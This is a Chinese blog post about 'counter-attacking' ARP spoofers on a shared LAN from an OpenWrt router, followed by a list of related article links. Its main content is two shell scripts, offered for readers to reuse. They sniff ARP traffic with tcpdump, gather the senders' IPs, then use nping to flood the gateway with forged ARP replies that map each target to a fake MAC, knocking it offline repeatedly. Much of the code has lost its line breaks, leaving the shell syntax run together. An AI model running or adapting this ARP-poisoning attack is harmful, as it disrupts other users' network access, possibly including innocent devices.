openwrt反攻局域网arp攻击shell脚本
shell脚本,局域网arp攻击狗实在蛋疼,arptables防火墙只能防止向下欺骗,没法保证这些人攻击网关,所以我给旧路由(极路由1s) 刷了openwrt,用screen 运行了自己写的反攻脚本!
无人值守,自动攻击,对方几分钟断网一次,对于打游戏的那帮人,估计快疯了,横行嚣张局域网1年了,这会儿丫估计快尿了!不建议不懂shell的用,要安装好些软件,ip-full,arptables,nping…
我把代码放上来,懂得拿去改改用,懒得注释!
1.主脚本,用于收集arp攻击设备ip,去重,然后调用子脚本多线程攻击
#!/bin/shmac_spc() {local i=$(awk 'BEGIN{srand();printf int((2355*rand())+1)}')local f=$(cat macf6e.txt | sed -n "${i}p")local s=$(echo '0123456789ABCDEF' | awk '{srand(); for (i = 1; i <= 6; i++){printf substr($0,int((16*rand())+1),1)}}')local l=":${s:0:2}:${s:2:2}:"echo $f$l
}
rnd_num() {echo $(awk 'BEGIN{srand();printf int((4*rand())+1)}')return 0
}wd=$(ifconfig wlan0 | grep 'inet addr:' | awk -F '[: ]+' '{print $4}' | awk 'BEGIN{FS=".";OFS="."}{print $1,$2,$3}')
gw_ip="${wd}.1"
gw_mac=$(cat /proc/net/arp | grep -w "${gw_ip}" | awk '{print $4}')
ipx=$(ifconfig wlan0 | grep 'inet addr:' | awk -F '[: ]+' '{print $4}')
[ $1 ] && chs=$1 || chs=5
js=0
res=""
lst=""
chs=5
while getopts ':i' OPT; docase $OPT ini) $OPTARG + 10 &>/dev/null && chs=$OPTARG ;;esac
donewhile true; doarping -DI wlan0 ${gw_ip} &>/dev/nullsleep 1s>attc220806_file{tcpdump -qnei wlan0 arp net ${wd} and not host ${gw_ip} and dst host ${ipx} -l | awk -F '[, ]+' '{print $9}' >>attc220806_file} &>/dev/null &sleep 60skillall 'tcpdump'>attc220806_ressort -u attc220806_file | grep -v "^$" >attc220806_resif [ -s './attc220806_res' ]; thenlet js++fmacc=$(mac_spc)j=10if [ $js -gt $chs ]; thenjs=0cat /root/attc220806_alst /root/attc220806_res | sort -n | uniq -u >/root/attc220806_grdlst="/root/attc220806_grd"elselst="/root/attc220806_res"fiwhile read i; dolet j++macc="${fmacc}$j"{./ntt2.sh 6 100 "${gw_ip}" "${gw_mac}" "${i}" "${macc}"} &>/dev/null &done <${lst}waitres="table: ${lst}, $(date +%Y'-'%m'-'%d' '%H':'%M':'%S)"echo -e "${res}" | tee -a /root/libfl/attc220806logcat ${lst} >>/root/libfl/attc220806logelseecho -e "attc220806_res empty!... $(date +%Y'-'%m'-'%d' '%H':'%M':'%S)" | tee -a /root/libfl/attc220806logfisleep $(rnd_num)m
done
2.子脚本ntt2.sh,用于调用nping 刷网关缓存,把对方的ip刷到一个不存在的mac,让对方无法上网
#!/bin/shmac_rnd() {local i=$(awk 'BEGIN{srand();printf int((2355*rand())+1)}')local f=$(cat /root/macf6e.txt | sed -n "${i}p")local s=$(echo '0123456789ABCDEF' | awk '{srand(); for (i = 1; i <= 6; i++){printf substr($0,int((16*rand())+1),1)}}')local l=":${s:0:2}:${s:2:2}:${s:4:2}"echo $f$lreturn 0
}ctt=$1
ktt=$2
gtw_ip=$3
gtw_mac=$4
fwip=$5
fmac=$6# echo "nping --arp --arp-type arp-reply --arp-target-mac $gtw_mac --arp-target-ip $gtw_ip --arp-sender-ip $fwip --arp-sender-mac $fmac -c 1 $gtw_ip"tmp_fifo="./$$.fifo"
mkfifo "${tmp_fifo}"
exec 6<>"${tmp_fifo}"
rm -rf "${tmp_fifo}"for i in $(seq 1 $ctt); doecho
done >&6for j in $(seq 1 $ktt); doread -u6{nping --arp --arp-type arp-reply --arp-target-mac $gtw_mac --arp-target-ip $gtw_ip --arp-sender-ip $fwip --arp-sender-mac $fmac -c 1 $gtw_ipecho >&6} &>/dev/null &
done
wait
exec 6<&-
exec 6>&-
exit 0
3.效果大概如下图,用另一台openwrt 路由tcpdump 抓的arp包
openwrt反攻局域网arp攻击shell脚本相关推荐
- linux cc脚本,Linux运维知识之Linux简单处理CC攻击shell脚本
本文主要向大家介绍了Linux运维知识之Linux简单处理CC攻击shell脚本,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助. 第一个脚本是通过查找日志中访问次数过多的ip,并 ...
- kali局域网ARP攻击欺骗+图片获取
kali局域网ARP攻击二 再次声明: 小白一枚 小白一枚 小白一枚 更多教程和软件尽在:https://xiaobaif.cn 第一次我们写到ARP的断网攻击,使目标IP的网络不可以使用,这样很容易 ...
- 局域网ARP攻击问题
局域网ARP攻击问题 防范ARP地址欺骗类病毒 什么是ARP协议 要想了解ARP欺骗攻击的原理,首先就要了解什么是ARP协议.ARP是地址转换协议的英文缩写,它是一个链路层协议,工作在OSI模 ...
- 局域网arp攻击_arp网络攻击,局域网要瘫痪了,网络工程师教你怎么做
局域网内出现ARP攻击,用户闹翻天,网管疲于奔命的事,可能很多人了都遇见过.下面我就提供给大家一个完整的解决方案,从此远离ARP攻击. ARP攻击远离拓扑 一.先介绍下ARP攻击的几种模式,我们才能有 ...
- 关于局域网ARP攻击,MAC地址欺骗的解决方法
最近很多网络反映频繁断线并且网速较慢,已经确认:这是由于一种名为"网吧传奇杀手Trojan.PSW.LMir.qh " 的病毒爆发引起的,现我们发布查找病毒以及基本解决办法: ...
- 局域网arp攻击_网络安全基础之ARP攻击和防御
本文转载于 SegmentFault 社区 作者:吴小风 前言 在看这篇文章之前,请大家先看下交换机的工作原理,不知大家有没有想过数据链路层中头部协议数据帧的目的MAC地址是如何获取的呢?这就是今天的 ...
- 局域网arp攻击_图解ARP协议(三)ARP防御篇-如何揪出“内鬼”并“优雅的还手”...
一.ARP防御概述 通过之前的文章,我们已经了解了ARP攻击的危害,黑客采用ARP软件进行扫描并发送欺骗应答,同处一个局域网的普通用户就可能遭受断网攻击.流量被限.账号被窃的危险.由于攻击门槛非常低, ...
- 局域网arp攻击_如何排查ARP网络攻击
ARP攻击危害:众所周知,ARP攻击变得日益猖狂,局域网内频繁性区域或整体掉线.IP地址冲突:网速时快时慢.极其不稳定,严重影响了网络的正常通讯. 那么如何排查ARP网络攻击呢? 首先诊断是否为ARP ...
- 局域网arp攻击_ARP局域网攻防浅析
ARP官方释意:地址解析协议,即ARP(Address Resolution Protocol),是根据获取的一个.发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息, ...
- 局域网arp攻击_3分钟告诉你,你是如何在使用公共WIFI时被黑客攻击的!
由于笔记本电脑,手机等设备对互联网连接的需求非常大,公共WiF已经非常普遍了.虽然这为使用该服务的人提供了便利,但是很多意想不到的事情都有可能发生,因为公共WiFi基本上意味着任何黑客都可以随时掌握 ...
最新文章
- 2019 GDCPC or HDU6540 树形dp[计数dp] 详解
- linux下的网络管理命令,常用linux网络管理命令(下)
- 洛谷 P1958 上学路线-dfs
- 83. 删除排序链表中的重复元素 golang
- 如何将深度学习训练速度提升一百倍?PAISoar 来了
- 集合使用与内部实现原理
- elementui 表格格式化
- java 图形化界面 布局管理器
- 手动导入第三方工程/类库
- VS2015 无法启动IIS Express Web服务器
- 显卡属于计算机主机还是外设,计算机硬件组成及作用有哪些
- 神经网络(二)—— 神经元、Logistic回归模型
- C#控制定位Word光标移动到任意行或者最后一行,取得光标位置等操作
- 国内移动广告平台的现状对比(2010年8月-10月)
- IC设计中的glitch free时钟切换
- 信号与系统 频域分析
- 软件测试工程师需要学什么?
- 有房没房,日子过的都是心态
- 启动服务提示端口已存在的处理方法
- 你绝对不能错过的7款开源硬件架构